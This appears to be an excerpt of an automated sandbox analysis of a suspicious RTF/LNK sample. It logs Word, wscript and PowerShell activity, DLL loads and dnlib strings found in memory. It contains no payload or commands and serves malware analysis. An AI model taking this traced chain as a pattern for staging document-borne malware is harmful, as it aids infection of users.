Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: IpEmBW3Qw5.LNK.0.drLNK file: ..\..\..\..\..\Desktop\IpEmBW3Qw5.rtf
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.385123337.0000000004430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb.pdbt.Automation.pdb source: powershell.exe, 00000008.00000002.385304370.0000000004F90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.380118041.0000000000859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.385123337.0000000004430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.385613212.00000000062E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.382187322.0000000004289000.00000004.00000800.00020000.00000000.sdmp
